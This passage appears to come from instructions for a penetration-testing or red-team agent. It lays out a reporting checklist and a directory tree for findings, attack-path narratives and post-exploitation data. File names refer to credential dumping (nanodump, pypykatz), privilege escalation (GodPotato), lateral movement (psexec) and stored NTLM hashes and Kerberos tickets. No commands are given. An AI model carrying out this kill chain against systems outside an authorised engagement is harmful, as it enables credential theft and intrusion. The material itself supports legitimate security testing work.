- [ ] findings/attack-paths/PATH-{NNN}.md written if the objective was a multi-step chain
- [ ] update_objective called to record completion
Resulting layout:
```
findings/
├── FIND-005.md # Finding documents — stable FIND-NNN key (id in frontmatter)
├── FIND-007.md
├── FIND-008.md
├── FIND-010.md
├── attack-paths/
│ └── PATH-001.md # Full kill chain narrative
└── evidence/
├── FIND-005_godpotato.txt # Evidence keyed by finding ID
├── FIND-005_privs.txt
├── FIND-007_nanodump.txt
├── FIND-007_pypykatz.txt
├── FIND-008_psexec.txt
├── FIND-008_domain_info.txt
└── FIND-010_share_listing.txt
post-exploit/
├── creds/
│ ├── ntlm_hashes.txt # Operational credential store
│ └── kerberos_tickets/
├── privesc/
│ └── escalation_log.json # Operational log
├── lateral/
│ └── movement_log.json # Operational log
└── network_map.json # Operational data
```
The findings/ directory contains deliverable documents (Markdown). The post-exploit/ directory contains operational data files (JSON/text) used during the engagement and is not itself a deliverable.